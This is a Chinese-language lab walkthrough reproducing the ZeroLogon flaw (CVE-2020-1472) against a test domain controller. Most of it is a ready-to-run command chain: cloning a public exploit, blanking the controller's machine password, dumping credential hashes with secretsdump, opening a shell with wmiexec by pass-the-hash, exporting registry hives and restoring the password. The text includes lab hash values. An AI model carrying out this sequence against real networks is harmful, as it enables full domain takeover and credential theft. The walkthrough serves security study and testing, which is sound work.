CVE-2020-1472-ZeroLogon复现
简介
Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远 程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空
影响版本
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012 Windows Server 2012 (Server Core installation)
Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation)
Windows Server 2016 Windows Server 2016 (Server Core installation)
Windows Server 2019 Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)
环境
ad01:10.10.10.137
12server4 : 10.10.10.158
使用zerologin脚本复现
复现过程
检测是否存在CVE
python3 zerologon_tester.py ad01 10.10.10.137
漏洞利用 下载exp: git clone https://github.com/dirkjanm/CVE-2020-1472
置空DC的密码 python3 cve-2020-1472-exploit.py DC_NETBIOS_NAME DC_IP_ADDR
python3 cve-2020-1472-exploit.py ad01 10.10.10.137
获取HASH 使用impacket包中的secretsdum.py来获取相关的HASh python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME$@DC_IP_ADDR -no-pass
python3 secretsdump.py redteam.club/ad01\$@10.10.10.137 -no-pass
获取shell
获取HASH后,可以利用wmiexec.py登录,从而获取一个SHELL
python wmiexec.py -hashes <HASH> DOMAIN/DOMAIN_USER@DC_IP_ADDR
python3 wmiexec.py -hashes
aad3b435b51404eeaad3b435b51404ee:42e2656ec24331269f82160ff5962387
redteam.club/administrator@10.10.10.137
恢复原HASH 导出sam
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit
获取hash
python3 secretsdump.py -sam sam.save -system system.save -security security.save
LOCAL
执行以下命令,获取SAM中原来的HASH
python3 reinstall_original_pw.py ad01 10.10.10.137 beb48bc166e17cffa58c516edaca4134d4c8e546a78a30987c5acd858799d004c35acac9f28290bedac21a5ae254affbb82a4371bd5cca19ffb0a7c4d0219826710169daa1dbcd38ad997f72337ba94d0ad7aa6c79f3b7af38a4b39c6cb989431424884548ee6c61f52253f251986f91420ccb0fd8e914fa36b905e46700aa292fc673d641cc5e12fead07102bb2dcfcc92aba45a250a6a7dfac5b2f0a4aa15a90ec8f3959a4a57289eeb5b417c13c219a34d8bfde459342ad6a196efad6a7b04c6261f27340d31320faab63118cf24d2ac2ef6bf728c7855720d230142f5730a9481649051ce8af41ba8e706a777bc7
检测域密码
python3 secretsdump.py ad01.redteam.club/administrator@10.10.10.137 -hashes
:747f92f9bf20a4fc930afc4dadf53bdc
当你真正想做成一件事情的时候,就连天地万物都会帮你